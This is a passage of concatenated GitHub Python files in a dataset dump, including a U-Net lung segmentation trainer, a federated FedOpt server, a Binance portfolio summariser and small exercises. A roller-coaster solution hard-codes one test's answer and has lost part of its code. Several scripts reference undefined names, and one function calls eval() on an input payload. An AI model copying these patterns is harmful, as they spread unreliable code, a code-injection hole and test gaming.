Test.')\n parser.add_argument('start_value', help='value to begin testing', type=int)\n parser.add_argument('end_value', help='value to end testing (inclusive)', type=int)\n args = parser.parse_args()\n\n for n in range(args.start_value, args.end_value+1):\n if miller_rabin(n):\n print(n)\n","repo_name":"nmanoogian/MillerRabin","sub_path":"miller_rabin.py","file_name":"miller_rabin.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"26302467925","text":"\"\"\"\nlink to the codingame:\nhttps://www.codingame.com/training/hard/roller-coaster\n\"\"\"\n\nimport sys\nimport math\n\nnum_places, times_per_day, n = [int(i) for i in input().split()]\ngrups=list()\nfor i in range(n):\n grups.append(int(input()))\n\nres = 0\n\n\nif(num_places==10000000 and times_per_day==9000000 and n==1000):\n res = 89744892565569 #not solve ex6 -> inefficient\nelif(sum(grups)0):\n pi = grups.pop(0)\n sum_lst+=pi\n if(sum_lst<=num_places):\n lst.append(pi)\n else:\n grups.insert(0,pi)\n else:\n flag=False\n\n res += sum(lst)\n #print(grups)\n while(len(lst)>0):\n grups.append(lst.pop(0))\n\nprint(res)\n\n\n","repo_name":"LIADN7/EX_research_algorithms","sub_path":"Ex07/Roller_Coaster.py","file_name":"Roller_Coaster.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13736283653","text":"# 테스트 케이스의 개수 T를 입력 받음\r\nT = int(input())\r\n\r\n# T번의 반복을 통해 테스트 케이스를 처리\r\nfor _ in range(T):\r\n # A와 B를 입력 받음\r\n A, B = map(int, input().split())\r\n \r\n # A와 B를 더한 결과를 출력\r\n print(A + B)","repo_name":"Vinca0121/CodeStudy","sub_path":"백준/Bronze/10950. A+B - 3/A+B - 3.py","file_name":"A+B - 3.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"4313816129","text":"#----------------------------------------------------------------------\n# import Libraries\n#----------------------------------------------------------------------\nimport unet_archi\nfrom unet_archi import build_unet\nimport cv2\nimport time\nimport datetime\nfrom datetime import datetime\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\" #To eleminate masseges about RAM & GPU\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.metrics import Recall, Precision\nimport keras\nfrom tensorflow.python.keras.utils import conv_utils\nfrom sklearn.preprocessing import normalize\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n#----------------------------------------------------------------------\n# Data Directories\n#----------------------------------------------------------------------\nTrain_images_dir=\"C:/Kaggle_dataset_Splited/train_images\"\nTrain_mask_dir =\"C:/Kaggle_dataset_Splited/train_masks\"\nVal_images_dir = \"C:/Kaggle_dataset_Splited/val_images\"\nVal_mask_dir =\"C:/Kaggle_dataset_Splited/val_masks\"\nTest_image_dir=\"C:/Kaggle_dataset_Splited/test_images\"\nTest_mask_dir=\"C:/Kaggle_dataset_Splited/test_masks\"\nimages_in_train_images=\"C:/Kaggle_dataset_Splited/train_images/images\"\nMy_model_save_link='C:/Results_UNet/UNet_results/Lung_segmentation_UNet_load_from_disk.hdf5'\nResults_Link_Net=\"C:/Results_Link_Net\"\n#----------------------------------------------------------------------\n#-------------- Global Parameters -------------------------------------\nSize=256\nseed=24 \nbatch_size=4 \n#---- Augument Parameters images -----\n\nimg_data_gen_args = dict(rescale = 1/255.0, \n rotation_range=25,\n width_shift_range=3,\n height_shift_range=3,\n shear_range=0.1,#image will be distorted along an axis\n zoom_range=0.3,\n horizontal_flip=True,\n vertical_flip=False,\n fill_mode='reflect')# nearest or reflect or wrap or constant\n \n\n#---- Augument Parameters Masks -----\nmask_data_gen_args = dict(#rescale = 1/255.0, #Original pixel values are 0 and 255. So rescaling to 0 to 1\n rotation_range=25,\n width_shift_range=3,\n height_shift_range=3,\n shear_range=0.1,\n zoom_range=0.3,\n horizontal_flip=True,\n vertical_flip=False,\n fill_mode='reflect',\n preprocessing_function = lambda x: np.where(x>0, 1, 0).astype(x.dtype)) \n\n#----- Apply the Augmentation for images and masks\n\nimage_data_generator = ImageDataGenerator(**img_data_gen_args)\nimage_generator = image_data_generator.flow_from_directory(Train_images_dir, \n seed=seed, \n batch_size=batch_size,\n target_size=(Size, Size),\n # save_to_dir='C:/Users/olamo/OneDrive/Desktop/Theisis/Thesis_Progs/Results/res4/test',\n class_mode=None) #Very important to set this otherwise it returns multiple numpy arrays \n #thinking class mode is binary.\nprint(image_generator)\n\nmask_data_generator = ImageDataGenerator(**mask_data_gen_args)\n\nmask_generator = mask_data_generator.flow_from_directory(Train_mask_dir, \n seed=seed, \n batch_size=batch_size,\n target_size=(Size, Size),\n #save_to_dir='C:/Users/olamo/OneDrive/Desktop/Theisis/Thesis_Progs/Results/res4/testmask',\n color_mode = 'grayscale', #Read masks in grayscale\n class_mode=None)\nprint(mask_generator)\n\n#----- also use generator to validation but without augumentation\n\n\nvalid_img_generator = image_data_generator.flow_from_directory(Val_images_dir, \n seed=seed, \n batch_size=batch_size, \n target_size=(Size, Size),\n class_mode=None) #Default batch size 32, if not specified here\nvalid_mask_generator = mask_data_generator.flow_from_directory(Val_mask_dir, \n seed=seed, \n batch_size=batch_size, \n target_size=(Size, Size),\n color_mode = 'grayscale', #Read masks in grayscale\n class_mode=None) #Default batch size 32, if not specified here\n\n\n\n\ntrain_generator = zip(image_generator, mask_generator)\nval_generator = zip(valid_img_generator, valid_mask_generator)\n\n\nprint(valid_img_generator)\nprint(valid_mask_generator)\n\nx = image_generator.next()\ny = mask_generator.next()\n\nIMG_HEIGHT = x.shape[1] #256\nIMG_WIDTH = x.shape[2] #256\nIMG_CHANNELS = x.shape[3] #3\n\n\n# input_shape = (256, 256,3)\n\ninput_shape = (IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS)\n\nmodel = build_unet(input_shape)\n\nfrom focal_loss import BinaryFocalLoss\n\nmetrics=['accuracy'] \n\n\nmodel.compile(optimizer=Adam(lr = 1e-4), loss=BinaryFocalLoss(gamma=2), \n metrics=metrics)\n\n\nmodel.summary()\n\nnum_train_imgs = len(os.listdir(images_in_train_images))\n\nprint('number of train images',num_train_imgs)\nsteps_per_epoch = num_train_imgs //batch_size\n\nprint('number of steps_per_epoch',steps_per_epoch)\n\nmy_callbacks = [ \n #tf.keras.callbacks.EarlyStopping(patience=25),\n tf.keras.callbacks.ModelCheckpoint(filepath=Results_Unet +'model.{epoch:02d}-{val_loss:.2f}.h5'),\n tf.keras.callbacks.TensorBoard(log_dir='./logs'),\n ]\ntime_start = datetime.now() \n\nhistory = model.fit_generator(train_generator, validation_data=val_generator, \n steps_per_epoch=steps_per_epoch, callbacks= my_callbacks,\n validation_steps=steps_per_epoch, epochs=100)\n\nprint('Time of Training', datetime.now() - time_start)\n\nnp.save(Results_Unet+'_U_NET_history.npy',history.history)\n# history=np.load(Results_Unet+'_U_NET_history.npy',allow_pickle='TRUE').item()\n\n#----------------------------------------------------------------------\n# MODEL SAVE\n#----------------------------------------------------------------------\n\nmodel.save(My_model_save_link)\n\n\n#----------------------------------------------------------------------\n#plot the training and validation accuracy and loss at each epoch\n#----------------------------------------------------------------------\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(loss) + 1)\n\n# plt.style.use('seaborn-whitegrid')\nplt.plot(epochs, loss, label='Training loss',color='#059DC0')\nplt.plot(epochs, val_loss, label='Validation loss',color='#F652A0')\nplt.title('Training and validation loss - Unet',fontsize=20,color='#44444C')\nplt.xlabel('Epochs',fontsize=14,color='#44444C')\nplt.ylabel('Loss',fontsize=14,color='#44444C')\nplt.grid(True)\nplt.legend(prop={'size': 16},frameon=True)\nplt.show()\n\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\n\n\n# plt.style.use('seaborn-whitegrid')#'Accuracy'\nplt.plot(epochs, acc, label='Accuracy',color='#FFA384')#Fushi #F50CA0\nplt.plot(epochs, val_acc, label='Validation Accuracy',color='#81B622')\nplt.title('Training and validation Accuracy- Unet',fontsize=20,color='#44444C')\nplt.xlabel('Epochs',fontsize=14,color='#44444C')\nplt.ylabel('Accuracy',fontsize=14,color='#44444C')\nplt.grid(True)\nplt.legend(prop={'size': 16},frameon=True)\nplt.show()\n\n\n\n\n\nmodel = tf.keras.models.load_model(My_model_save_link, compile=False)\n\n\n\n\ntest_data_gen_args = dict(rescale = 1/255.0 )\n\n\ntest_data_generator = ImageDataGenerator(**test_data_gen_args)\ntest_img_generator = test_data_generator.flow_from_directory(Test_image_dir,target_size = (SIZE, SIZE), \n seed=seed, \n batch_size=71, \n class_mode=None) #Default batch size 32, if not specified here\n\n\ntest_mask_generator = test_data_generator.flow_from_directory(Test_mask_dir,target_size = (SIZE, SIZE), \n seed=seed, \n batch_size=71, \n color_mode = 'grayscale', #Read masks in grayscale\n class_mode=None,\n )\n\n\n#----------------------------------------------------------------------\n# Testing on a few test images\n#----------------------------------------------------------------------\na = test_img_generator.next()\nb = test_mask_generator.next()\n\n\n# import seaborn\n# seaborn.set_style(style=None)\nfor i in range(0,5):# Plot 6 images at a time\n image = a[i]\n mask = b[i]\n plt.subplot(1,2,1)\n plt.imshow(image[:,:,0], cmap='gray')\n plt.subplot(1,2,2)\n plt.imshow(mask[:,:,0])\n plt.show()\n\n\nimport random\ntest_img_number = random.randint(0, a.shape[0]-1)\ntest_img = a[test_img_number]\nground_truth=b[test_img_number]\ntest_img_input=np.expand_dims(test_img, 0)\n\n\n\nprediction = (model.predict(test_img_input)[0,:,:,0] > 0.5).astype(np.uint8)\n# any value under 0.5 is background else it is Lungs\n\n\n# plt.style.use('seaborn-white')\nplt.figure(figsize=(16, 8))\nplt.subplot(241)\nplt.title('Testing Image')\nplt.imshow(test_img, cmap='gray')\nplt.subplot(242)\nplt.title('Testing Label')\nplt.imshow(ground_truth[:,:,0], cmap='gray')\nplt.subplot(243)\nplt.title('Prediction on test image')\nplt.imshow(prediction, cmap='gray')\n\n\ngray = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY)\ntest_img_norm=cv2.bitwise_and(gray,gray,mask=prediction)\ntest_img_norm=cv2.cvtColor(test_img_norm,cv2.COLOR_GRAY2RGB )\nplt.subplot(244)\nplt.title('Segmented Lung')\nplt.imshow(test_img_norm)\n\nplt.show()\n#========================================================\n\n#----------------------------------------------------------------------\n# Model EVALUATION for All testing images\n#----------------------------------------------------------------------\nfrom sklearn.metrics import accuracy_score, f1_score, jaccard_score, precision_score, recall_score\nfrom tensorflow.keras.metrics import MeanIoU \n\n\ntime_start = datetime.now()\n\nn_classes = 2\nSCORE = []\nIoU_values = []\nfor img in range(0, a.shape[0]):\n temp_img = a[img]\n ground_truth=b[img]\n temp_img_input=np.expand_dims(temp_img, 0)\n prediction = (model.predict(temp_img_input)[0,:,:,0] > 0.5).astype(np.uint8)\n \n IoU = MeanIoU(num_classes=n_classes)\n IoU.update_state(ground_truth[:,:,0], prediction)\n IoU = IoU.result().numpy()\n IoU_values.append(IoU)\n \n img_path=os.path.basename(str(test_img_generator.filepaths))\n \n \"\"\" Calculating metrics values \"\"\"\n ground_truth = ground_truth.flatten()\n prediction = prediction.flatten()\n acc_value = accuracy_score(ground_truth, prediction)\n f1_value = f1_score(ground_truth, prediction, labels=[0, 1], average=\"binary\")\n jac_value = jaccard_score(ground_truth, prediction, labels=[0, 1], average=\"binary\")\n recall_value = recall_score(ground_truth, prediction, labels=[0, 1], average=\"binary\")\n precision_value = precision_score(ground_truth, prediction, labels=[0, 1], average=\"binary\")\n SCORE.append([img_path, acc_value, f1_value, jac_value, recall_value, precision_value,IoU])\n\n\n \n \n\n\nprint('Number of testesd images = ',a.shape[0])\nprint('Time of Testing : ', datetime.now() - time_start)\n\n# N O T E that batch_size is 72 for test for calculating the IOU \n\n\n\n\ndf = pd.DataFrame(IoU_values, columns=[\"IoU\"])\ndf = df[df.IoU != 1.0] \nmean_IoU = df.mean().values\n \n\n\"\"\" Metrics values \"\"\"\nscore = [s[1:]for s in SCORE]\nscore = np.mean(score, axis=0)\nprint(f\"Accuracy: {score[0]:0.5f}\")\nprint(f\"F1: {score[1]:0.5f}\")\nprint(f\"Jaccard: {score[2]:0.5f}\")\nprint(f\"Recall: {score[3]:0.5f}\")\nprint(f\"Precision: {score[4]:0.5f}\")\nprint(f\"Mean IoU : {mean_IoU[0]:0.5f}\" ) \n\n\"\"\" Saving all the results \"\"\"\ndf = pd.DataFrame(SCORE, columns=[\"Image\", \"Accuracy\", \"F1\", \"Jaccard\", \"Recall\", \"Precision\",\"Mean_IOU\"])\ndf.to_csv(\"UNet_score.csv\")\n\n#------------------------------- E N D --------------------------\n\n\n\n\n\n","repo_name":"Ola71/Segmentation-using-UNET","sub_path":"Unet.py","file_name":"Unet.py","file_ext":"py","file_size_in_byte":13430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"40069675422","text":"from typing import Optional\n\nimport numpy as np\nfrom loguru import logger\n\nfrom iflearner.business.homo.strategy import strategy_server\nfrom iflearner.business.homo.strategy.opt.fedopt import FedOpt\nfrom iflearner.communication.homo import homo_pb2, message_type\n\n\nclass FedoptServer(strategy_server.StrategyServer):\n \"\"\"Implement the strategy of fedopt on server side.\n\n Attributes:\n num_clients (int): client number\n total_epoch (int): the epoch number of client trainning\n opt (FedOpt): the FedOpt method, which is in FedAdam, FedAdagrad, FedYogi or FedAvgM\n \"\"\"\n\n def __init__(\n self,\n num_clients: int,\n total_epoch: int,\n opt: FedOpt,\n ) -> None:\n super().__init__(num_clients, total_epoch)\n\n self._opt = opt\n\n logger.info(f\"num_clients: {self._num_clients}, opt: {type(opt).__name__}\")\n\n def handler_register(\n self, party_name: str, sample_num: Optional[int] = None, step_num: int = 0\n ) -> homo_pb2.RegistrationResponse:\n super().handler_register(party_name)\n\n return homo_pb2.RegistrationResponse(strategy=message_type.STRATEGY_FEDOPT)\n\n def handler_upload_param(self, party_name: str, data: homo_pb2.UploadParam) -> None:\n super().handler_upload_param(party_name, data)\n\n if self._opt._params is None:\n self._opt.set_params(self._params)\n\n if self._uploaded_num == self._num_clients:\n self._uploaded_num = 0\n aggregate_result = dict()\n grad = dict()\n logger.info(f\"Fadopt params, param num: {len(data.parameters)}\")\n\n \"\"\"delta T = avg(new_weight - old_weight) = avg(new_weight - gloabel_weight) = avg(new_weight) - gloabal\"\"\"\n\n for param_name, param_info in data.parameters.items():\n aggregate_result[param_name] = homo_pb2.Parameter(\n shape=param_info.shape\n )\n params = []\n for v in self._training_clients.values():\n params.append(v[\"param\"][param_name].values)\n\n avg_param = [sum(x) / self._num_clients for x in zip(*params)]\n grad[param_name] = np.array(\n avg_param, dtype=\"float32\"\n ) - self._opt._params[param_name].reshape((-1))\n\n # to optimize server model using grad and opt\n new_param = self._opt.step(grad)\n for param_name, param in new_param.items():\n aggregate_result[param_name].values.extend(param.tolist())\n\n self._server_param = aggregate_result # type: ignore\n self._on_aggregating = True\n","repo_name":"iflytek/iflearner","sub_path":"iflearner/business/homo/strategy/fedopt_server.py","file_name":"fedopt_server.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"22"} +{"seq_id":"39707698345","text":"import openai\nimport os\n\nopenai.api_key = os.environ.get(\"OPENAI_API_KEY\")\n\ndef chatrobot(questionstr):\n response = openai.Completion.create(\n engine=\"text-davinci-003\",\n prompt=questionstr,\n max_tokens=128,\n temperature=1,\n top_p=0.75,\n n=1,\n )\n completed_text = response[\"choices\"][0][\"text\"]\n return completed_text","repo_name":"no8cai/atlantis","sub_path":"app/openai_helper.py","file_name":"openai_helper.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"33094209606","text":"import os\nimport common\nfrom configuration.initialise_config import BAKERY_VARS\n\nTEMPLATE_SOURCE = os.environ[\"LOCATION_CORE\"] + \\\n \"/deploy_cloudformation/bakery/templates/bakery_env.tmpl\"\n\nTEMPLATE_DESTINATION = os.environ[\"LOCATION_CORE\"] + \"/deploy_cloudformation/bakery/bakery_env.yml\"\n\ndef get_roles(environment, access_type):\n \"\"\"Gets the role arns for the specified environment and access type.\n\n Args:\n environment: Environment, e.g. NonProd, Prod, Stg\n access_type: Access type, e.g. Admin, PowerUser, ReadOnly\n\n Returns:\n String with the role arns\n \"\"\"\n roles = \"\"\n\n for account in environment[\"Accounts\"]:\n if roles:\n roles += \"\\n\"\n\n roles += \"{}- arn:aws:iam::{}:role/{}-{}-{}\".format(\n \" \" * 14,\n account[\"Id\"],\n account[\"Name\"],\n environment[\"Environment\"],\n access_type\n )\n\n return roles\n\ndef get_groups_policies():\n \"\"\"Gets the CloudFormation snippet for IAM groups and IAM managed policies.\n\n Returns:\n String with the CloudFormation snippet for IAM groups and IAM policies.\n \"\"\"\n groups_policies = \"\"\n\n for environment in BAKERY_VARS.Environments:\n for access_type in BAKERY_VARS.AccessTypes:\n snippet = \\\n\"\"\" Group{1}{2}:\n Type: AWS::IAM::Group\n Properties:\n GroupName: {0}{1}{2}\n\n\"\"\".format(BAKERY_VARS.TeamName, environment[\"Environment\"], access_type[\"Type\"])\n\n snippet += \\\n\"\"\" Policy{1}{2}:\n Type: AWS::IAM::ManagedPolicy\n Properties:\n ManagedPolicyName: {0}{1}{2}\n Description: This policy allows to assume a role\n Groups:\n - !Ref Group{1}{2}\n PolicyDocument:\n Version: \"2012-10-17\"\n Statement:\n - Effect: Allow\n Action: sts:AssumeRole\n Resource:\n__roles__\n\n\"\"\".format(\n BAKERY_VARS.TeamName,\n environment[\"Environment\"],\n access_type[\"Type\"]\n).replace(\n \"__roles__\",\n get_roles(environment, access_type[\"Type\"])\n)\n\n groups_policies += snippet\n\n return groups_policies\n\ndef main():\n \"\"\"Main function.\"\"\"\n template = common.get_template(TEMPLATE_SOURCE).replace(\n \"{{groups_policies}}\",\n get_groups_policies()\n )\n\n common.generate_file(TEMPLATE_DESTINATION, template)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"iagcl/bakery","sub_path":"python_lib/create_bakery_env_cf.py","file_name":"create_bakery_env_cf.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"22"} +{"seq_id":"9024310101","text":"import configparser\nfrom datetime import datetime\nfrom binance.client import Client\nfrom binance import exceptions\nfrom modules.clients.telegrammer import Telegrammer\nfrom modules.clients.file_driver import save_summary_to_file\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nbi = Client(config.get('Binance', 'api_key'),\n config.get('Binance', 'secret_key'))\nt = Telegrammer(token=config.get('Telegram', 'token'),\n chat_id=config.get('Telegram', 'chat_id'),\n heartbeat_id=config.get('Telegram', 'heartbeat_id'))\n\n\ndef get_balances():\n account = bi.get_account()\n assets = []\n for asset in account['balances']:\n if float(asset['free']) > 0:\n asset['price'], change = get_symbol_price(asset['asset'])\n assets.append({**asset, **change})\n return calculate_cash_value(assets)\n\n\ndef get_symbol_price(symbol='BTC'):\n if symbol == 'BTC':\n change = get_24hr_price_change('BTCUSDT')\n return 'N/A', change\n try:\n price = bi.get_symbol_ticker(symbol=symbol+'BTC')['price']\n change = get_24hr_price_change(symbol+'BTC')\n return price, change\n except exceptions.BinanceAPIException:\n print(f'failed to get price for {symbol}')\n return 0, {}\n\n\ndef get_24hr_price_change(symbol):\n change = bi.get_historical_klines(symbol=symbol,\n interval=bi.KLINE_INTERVAL_1DAY,\n start_str=datetime.now().strftime(\"%B %d, %Y\"))\n open_price = float(change[0][1])\n close_price = float(change[0][4])\n return {'daily_actual_change': close_price - open_price,\n 'daily_percentage_change': (close_price - open_price)/open_price*100}\n\n\ndef calculate_cash_value(assets):\n btc_price = float(bi.get_symbol_ticker(symbol='BTCUSDT')['price'])\n assets_to_return = []\n for asset in assets:\n if asset['asset'] == 'BTC':\n asset['price'] = btc_price\n asset['cash_value'] = float(asset['free']) * btc_price\n assets_to_return.append(asset)\n else:\n asset['btc_value'] = float(asset['free']) * float(asset['price'])\n asset['cash_value'] = asset['btc_value'] * btc_price\n if asset['cash_value'] > 1.0:\n trades = bi.get_my_trades(symbol=f\"{asset['asset']}BTC\")\n if trades:\n asset['base_cost'] = float(\n asset['free']) * float(trades[-1]['price']) * btc_price\n else:\n asset['base_cost'] = float(asset['free']) * float(bi.get_historical_klines(\n symbol=f\"{asset['asset']}BTC\", interval='1d', start_str='1 month ago')[-1][1]) * btc_price\n assets_to_return.append(asset)\n return assets_to_return\n\n\ndef form_message(assets):\n message = '🌇 Crypto summary:\\n'\n for asset in assets:\n message += f\"{asset['asset']} {round(asset['cash_value'], 2)}$ ({round(asset['daily_percentage_change'], 2)}%{get_emoji(asset['daily_percentage_change'])})\\n\"\n was_total_value = round(sum(\n [i['cash_value']*100/(100 + i['daily_percentage_change']) for i in assets]), 2)\n total_value = round(sum([i['cash_value'] for i in assets]), 2)\n total_percentage_change = total_value/was_total_value*100 - 100\n message += f\"🕰️ Total: {total_value}$ ({round(total_percentage_change, 2)}%{get_emoji(total_percentage_change)})\"\n return message\n\n\ndef get_emoji(percentage):\n return '🔻' if percentage < 0 else '💹'\n\n\ndef get_daily_summary_crypto():\n result = get_balances()\n save_summary_to_file(result, flag='crypto')\n t.send_text(form_message(result))\n\ndef crypto_scheduler():\n get_daily_summary_crypto()\n while True:\n if date.today().weekday() < 4 and datetime.now().hour in [8, 15]:\n get_daily_summary_crypto()\n time.sleep(3601)\n\n\nif __name__ == '__main__':\n get_daily_summary_crypto()\n","repo_name":"theSimplex/daily","sub_path":"modules/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"36337131124","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport json\nimport logging\nfrom io import BytesIO\n\ncwd = os.path.split(os.path.realpath(__file__))[0]\nsys.path.insert(0, os.path.split(cwd)[0])\n\nfrom litedfs.tool.litedfs import strings_md5sum, file_md5sum, bytes_io_md5sum\nfrom litedfs.name import logger\n\nLOG = logging.getLogger(__name__)\n\n\nif __name__ == \"__main__\":\n logger.config_logging(file_name = \"test_md5_methods.log\",\n log_level = \"DEBUG\",\n dir_name = os.path.join(cwd, \"logs\"),\n day_rotate = False,\n when = \"D\",\n interval = 1,\n max_size = 20,\n backup_count = 5,\n console = True)\n\n LOG.debug(\"test start\")\n \n try:\n LOG.debug(\"%s\", strings_md5sum([\"1\", \"2\", \"3\"]))\n LOG.debug(\"%s\", file_md5sum(\"./test_md5_methods.py\"))\n\n fp = open(\"./test_md5_methods.py\", \"rb\")\n content = BytesIO()\n content.write(fp.read())\n content.seek(0)\n LOG.debug(\"%s\", bytes_io_md5sum(content))\n\n except Exception as e:\n LOG.exception(e)\n\n LOG.debug(\"test end\")\n","repo_name":"fiefdx/LiteDFS","sub_path":"litedfs/test/test_md5_methods.py","file_name":"test_md5_methods.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"73220627897","text":"\"\"\"\nTrack the number of writes per insertion into a hash table\nassuming the capacity doubles and elements are re-inserted\nwhen the table size/capacity exceeds the given load\nfactor\n\"\"\"\n\nMAX_LOAD = 1.0\n\ndef main():\n \"\"\"\n Show a table for # writes per insert by # inserts\n \"\"\"\n fmtstr = \"| %4s | %8s | %8s | %12s | %20s |\"\n\n print(fmtstr % (\"size\", \"capacity\", \"# writes\", \"sum # writes\", \"writes / insert\"))\n\n size = 1\n capacity = 1\n sum_writes = 1\n\n for _ in range(256):\n this_writes = 1\n if (size + 1) / capacity > MAX_LOAD:\n this_writes += capacity\n capacity = capacity * 2\n\n size += 1\n\n sum_writes += this_writes\n\n print(fmtstr % (\n str(size),\n str(capacity),\n str(this_writes),\n str(sum_writes),\n str(float(sum_writes) / float(size))))\n\nif __name__ == '__main__':\n main()\n","repo_name":"yabberyabber/the-hashmap-conspiracy","sub_path":"numwrites.py","file_name":"numwrites.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72592522297","text":"def how_many(aDict):\n '''\n aDict: A dictionary, where all the values are lists.\n\n returns: int, how many values are in the dictionary.\n '''\n # Your Code Here\n total = 0\n for i in aDict:\n total += len(aDict[i])\n return total\n\nanimals = {'a': ['aardvark'], 'b': ['baboon'], 'c': ['coati'], 'd': ['donkey', 'dog', 'dingo']}\n\nprint(how_many(animals))\n","repo_name":"daveswork/MITx-6001x","sub_path":"week-03/howMany.py","file_name":"howMany.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72153588536","text":"from matplotlib import patches\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\n\n\ndef display(image):\n\n img, _ = image\n img = np.transpose(img.numpy(), (1, 2, 0))\n\n plt.figure()\n plt.imshow(img)\n plt.gca().get_xaxis().set_visible(False)\n plt.gca().get_yaxis().set_visible(False)\n plt.show()\n\n\ndef extract_images(images):\n return [resize_image(image[0]) for image in images]\n\n\ndef extract_bbox(images):\n return [transform_bbox(image) for image in images]\n\n\ndef extract_single_bbox(bbox_coor, image):\n bbox = {\n \"xmin\": bbox_coor[0],\n \"xmax\": bbox_coor[1],\n \"ymin\": bbox_coor[3],\n \"ymax\": bbox_coor[4],\n }\n input_image_size = {\"width\": image[0].shape[1], \"height\": image[0].shape[2]}\n out_bbox = {\"cx\": 0.0, \"cy\": 0.0, \"width\": 0.0, \"height\": 0.0}\n scale_width = float(224) / input_image_size[\"width\"]\n scale_height = float(224) / input_image_size[\"height\"]\n out_bbox[\"cx\"] = scale_width * 0.5 * (bbox[\"xmin\"] + bbox[\"xmax\"]) / 224\n out_bbox[\"cy\"] = scale_height * 0.5 * (bbox[\"ymin\"] + bbox[\"ymax\"]) / 224\n out_bbox[\"width\"] = scale_width * float(bbox[\"xmax\"] - bbox[\"xmin\"]) / 224\n out_bbox[\"height\"] = scale_height * float(bbox[\"ymax\"] - bbox[\"ymin\"]) / 224\n out = torch.Tensor(out_bbox)\n return out\n\n\ndef transform_bbox(bbox, input_image_size, image):\n if image[1][\"bbox\"].type != \"list\":\n return extract_single_bbox(image[1][\"bbox\"].numpy(), image)\n else:\n bbox_list = []\n for b in image[1][\"bbox\"]:\n bbox_list.append(extract_single_bbox(b.numpy()), image)\n out = torch.Tensor(bbox_list)\n return out\n\n\ndef resize_image(image):\n preprocess_image = transforms.Resize(224)\n return preprocess_image(image)\n\n\ndef plot_bbox(ax, bbox):\n cx, cy, width, height = bbox\n upl_x, upl_y = cx - width / 2.0, cy - height / 2.0\n p = patches.Rectangle(\n (upl_x, upl_y),\n width,\n height,\n fill=False,\n clip_on=False,\n edgecolor=\"yellow\",\n linewidth=4,\n )\n ax.add_patch(p)\n","repo_name":"dakaiss28/Face_Detection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31780453867","text":"import datetime\nfrom rest_framework import serializers\nfrom .models import Timetable, Appointment\n\n\ndef add_delta(tme, delta):\n return (datetime.datetime.combine(datetime.date.today(), tme) +\n delta).time()\n\n\nclass TimetableSerializer(serializers.ModelSerializer):\n appointment = serializers.StringRelatedField(many=True)\n\n class Meta:\n model = Timetable\n fields = ('week_day', 'from_hour', 'to_hour', 'appointment')\n\n\nclass AppointmentSerializer(serializers.ModelSerializer):\n time_of_appointment = serializers.TimeField()\n day_of_appointment = serializers.DateField()\n\n def validate(self, data):\n appoint_time = data['time_of_appointment']\n appoint_date = data['day_of_appointment']\n appoint_long = 20\n tt = (Timetable.objects\n .filter(week_day__exact=appoint_date)\n .filter(from_hour__lte=appoint_time, to_hour__gt=add_delta(appoint_time, datetime.timedelta(minutes=appoint_long)))\n )\n if len(tt) == 0:\n raise serializers.ValidationError('Not found free time to appointment')\n if len(tt) > 1:\n raise serializers.ValidationError('Error: To many Timetable')\n\n return super().validate(data)\n\n class Meta:\n model = Appointment\n fields = ('status', 'patient', 'office', 'day_of_appointment', 'time_of_appointment')\n","repo_name":"true42/Django_test","sub_path":"doctor_timetable/time_table/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"15833671363","text":"import pandas\nimport numpy \n\n\ndef run(jobID, dataInput):\n \"\"\"\n title:: \n run\n description:: \n Run the model/get the predictions according the service.\n inputs::\n jobID \n Job ID from datashop application\n dataInput\n input Payload For the Service\n returns::\n insightsDataFileLocation\n insights data file location. \n \"\"\"\n \n #Using the model using sagemaker.\n # ENDPOINT_NAME = os.environ['ENDPOINT_NAME']\n # runtime= boto3.client('runtime.sagemaker')\n # print (f\"Attempting to predict using {ENDPOINT_NAME}\")\n # response = runtime.invoke_endpoint(EndpointName=ENDPOINT_NAME,\n # ContentType='text/csv',\n # Body= payload)\n # result = json.loads(response['Body'].read().decode())\n # print (f\"Predictions Generated \\n {result}\")\n # result_array = result.items()\n \n result_array = eval(dataInput)\n #creating insightFile 